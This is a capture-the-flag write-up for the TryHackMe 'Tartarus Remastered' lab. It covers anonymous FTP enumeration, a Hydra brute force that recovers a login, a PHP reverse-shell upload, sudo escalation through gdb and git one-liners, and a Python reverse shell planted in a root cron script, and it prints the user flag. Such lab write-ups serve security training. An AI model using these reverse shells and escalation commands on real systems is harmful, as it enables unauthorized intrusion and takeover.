mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
224 lines
6.4 KiB
Markdown
224 lines
6.4 KiB
Markdown
|
# TryHackMe-Tartarus Remastered
|
||
|
|
||
|
>Abdullah Rizwan | 21st September , 06:57 PM
|
||
|
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.164.74
|
||
|
Host is up (0.23s latency).
|
||
|
Not shown: 997 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
21/tcp open ftp vsftpd 3.0.3
|
||
|
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||
|
|_-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
|
||
|
| ftp-syst:
|
||
|
| STAT:
|
||
|
| FTP server status:
|
||
|
| Connected to ::ffff:10.8.94.60
|
||
|
| Logged in as ftp
|
||
|
| TYPE: ASCII
|
||
|
| No session bandwidth limit
|
||
|
| Session timeout in seconds is 300
|
||
|
| Control connection is plain text
|
||
|
| Data connections will be plain text
|
||
|
| At session startup, client count was 3
|
||
|
| vsFTPd 3.0.3 - secure, fast, stable
|
||
|
|_End of status
|
||
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
|
||
|
| 256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|
||
|
|_ 256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
|
||
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||
|
|_http-title: Apache2 Ubuntu Default Page: It works
|
||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||
|
Nmap done: 1 IP address (1 host up) scanned in 29.06 seconds
|
||
|
|
||
|
```
|
||
|
|
||
|
## PORT 80
|
||
|
|
||
|
`http://10.10.164.74/robots.txt`.
|
||
|
|
||
|
We can find robots.txt file from where we can see `/admin-dir` is accessible and there are possible usernames and passwords
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
## FTP (Port 21)
|
||
|
|
||
|
Since Anonymous FTP login is allowed we can use that to see what's in `www-data`'s directory.
|
||
|
```
|
||
|
ftp 10.10.164.74
|
||
|
Connected to 10.10.164.74.
|
||
|
220 (vsFTPd 3.0.3)
|
||
|
Name (10.10.164.74:root): anonymous
|
||
|
331 Please specify the password.
|
||
|
Password:
|
||
|
230 Login successful.
|
||
|
Remote system type is UNIX.
|
||
|
Using binary mode to transfer files.
|
||
|
ftp> ls -la
|
||
|
200 PORT command successful. Consider using PASV.
|
||
|
150 Here comes the directory listing.
|
||
|
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
|
||
|
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
|
||
|
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ...
|
||
|
-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
|
||
|
226 Directory send OK.
|
||
|
ftp>
|
||
|
|
||
|
```
|
||
|
We can use `get test.txt` to save it locally on our machine.
|
||
|
|
||
|
This was the content of `test.txt`
|
||
|
`vsftpd test file`
|
||
|
|
||
|
|
||
|
But there is another directory which you can miss because it's named as `...`
|
||
|
|
||
|
```
|
||
|
ftp> ls -la
|
||
|
200 PORT command successful. Consider using PASV.
|
||
|
150 Here comes the directory listing.
|
||
|
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
|
||
|
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
|
||
|
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 ...
|
||
|
226 Directory send OK.
|
||
|
ftp> cd ...
|
||
|
250 Directory successfully changed.
|
||
|
ftp> ls -la
|
||
|
200 PORT command successful. Consider using PASV.
|
||
|
150 Here comes the directory listing.
|
||
|
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 .
|
||
|
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
|
||
|
-rw-r--r-- 1 ftp ftp 14 Jul 05 21:45 yougotgoodeyes.txt
|
||
|
226 Directory send OK.
|
||
|
|
||
|
```
|
||
|
|
||
|
This is the content of `yougotgoodeyes.txt` which is a directory for the webpage.
|
||
|
`/sUp3r-s3cr3t`
|
||
|
|
||
|
|
||
|
## Hydra
|
||
|
|
||
|
```
|
||
|
hydra -L users -P passwords.txt 10.10.164.74 http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect"
|
||
|
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||
|
|
||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-21 10:35:30
|
||
|
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1313 login tries (l:13/p:101), ~83 tries per task
|
||
|
[DATA] attacking http-post-form://10.10.164.74:80/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect
|
||
|
[80][http-post-form] host: 10.10.164.74 login: enox password: P@ssword1234
|
||
|
|
||
|
```
|
||
|
After getting authenticated we are now shown an upload from where we could upload a php reverse shell
|
||
|
|
||
|
|
||
|
## Reverse Shell
|
||
|
|
||
|
|
||
|
Getting a reverse shell first setup netcat listener for any port you want as long as it is not being used
|
||
|
|
||
|
`nc -lvp 5555`
|
||
|
|
||
|
|
||
|
Then get reverse shell from pentest monkey : https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
|
||
|
|
||
|
In the php file change `$ip` and `$port` variable to you connected VPN IP and port on which you have set your netcat.
|
||
|
|
||
|
Upload it and execute it from here :
|
||
|
|
||
|
`http://10.10.164.74/sUp3r-s3cr3t/images/uploads/`
|
||
|
|
||
|
|
||
|
Just an extra step if you want you can stabilize shell using this technique so that you can use clear command or auto tab complete
|
||
|
|
||
|
```
|
||
|
1. python -c "import pty;pty.spawn('/bin/bash')";
|
||
|
2. ctrl+z
|
||
|
3. stty raw -echo
|
||
|
4. fg and then press enter 2 times.
|
||
|
|
||
|
```
|
||
|
You can then find user flag in `d4rckh` directory.
|
||
|
|
||
|
User flag : `0f7dbb2243e692e3ad222bc4eff8521f`
|
||
|
|
||
|
|
||
|
## Privilege Escalation
|
||
|
|
||
|
|
||
|
### thirtytwo
|
||
|
|
||
|
We can find SUID files with `find / -perm /4000` and we find `/var/www/gdb`
|
||
|
|
||
|
Then `sudo -l` we can see user `thirtytwo` can run gdb so visiting GTFOBINS we find this one liner which escalates us to user.
|
||
|
|
||
|
`sudo -u thirtytwo /var/www/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit`
|
||
|
|
||
|
|
||
|
Then again check for `sudo -l`
|
||
|
|
||
|
|
||
|
```
|
||
|
thirtytwo@ubuntu-xenial:/home/d4rckh$ sudo -l
|
||
|
Matching Defaults entries for thirtytwo on ubuntu-xenial:
|
||
|
env_reset, mail_badpass,
|
||
|
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
|
||
|
|
||
|
User thirtytwo may run the following commands on ubuntu-xenial:
|
||
|
(d4rckh) NOPASSWD: /usr/bin/git
|
||
|
|
||
|
```
|
||
|
We can see d4rchk can run `git` so let's try to escalate throguh `git`.
|
||
|
|
||
|
|
||
|
### d4rchk
|
||
|
|
||
|
1. sudo -u d4rchk git -p help config
|
||
|
2. !/bin/sh
|
||
|
|
||
|
|
||
|
```
|
||
|
$ whoami
|
||
|
d4rckh
|
||
|
|
||
|
```
|
||
|
|
||
|
### Root
|
||
|
|
||
|
`/home/d4rchk` has a file named `clean.py` we can see append the contents for python reverse shell then wait for a moment because this is running as a cron job.
|
||
|
|
||
|
|
||
|
```
|
||
|
d4rckh@ubuntu-xenial:/home/d4rckh$ nano cleanup.py
|
||
|
|
||
|
import socket,subprocess,os;
|
||
|
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||
|
s.connect(("10.8.94.60",9999))
|
||
|
os.dup2(s.fileno(),0)
|
||
|
os.dup2(s.fileno(),1)
|
||
|
os.dup2(s.fileno(),2)
|
||
|
p=subprocess.call(["/bin/sh","-i"])
|
||
|
|
||
|
```
|
||
|
Setting up again a netcat listener.
|
||
|
|
||
|
```
|
||
|
nc -lvp 9999
|
||
|
listening on [any] 9999 ...
|
||
|
10.10.164.74: inverse host lookup failed: Unknown host
|
||
|
connect to [10.8.94.60] from (UNKNOWN) [10.10.164.74] 53654
|
||
|
/bin/sh: 0: can't access tty; job control turned off
|
||
|
#
|
||
|
|
||
|
|
||
|
```
|